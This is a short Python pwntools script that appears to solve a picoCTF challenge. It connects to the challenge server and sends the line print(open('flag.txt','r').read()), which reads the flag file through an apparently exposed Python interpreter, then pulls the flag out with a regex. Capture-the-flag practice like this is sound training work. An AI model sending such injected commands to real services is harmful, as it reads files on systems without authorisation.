exploit.py

from pwn import *
import argparse
import re


def get_port():
    parser = argparse.ArgumentParser()
    parser.add_argument("port", help="The netcat port")
    input = parser.parse_args()
    return input.port


def send_command(conn, command):
    conn.sendline(command)
    response = conn.recv()
    return response


def get_flag(conn):
    command = b"print(open('flag.txt', 'r').read())"
    response = send_command(conn, command).decode("utf-8")
    print(f"Reponse: {response}")
    flag = re.findall(r'picoCTF{[^}]*}', response)
    return flag[0]


if __name__ == "__main__":
    server = "saturn.picoctf.net"
    port = get_port()
    conn = remote(server, port)
    try:
        flag = get_flag(conn)
        print("-"*50)
        print(f"Flag: {flag}")
        print("-"*50)
    except Exception as e:
        print(f"An error occurred: {e}")
        print("Run a few times, or try to restart the instance and then run again!!!")
    finally:
        conn.close()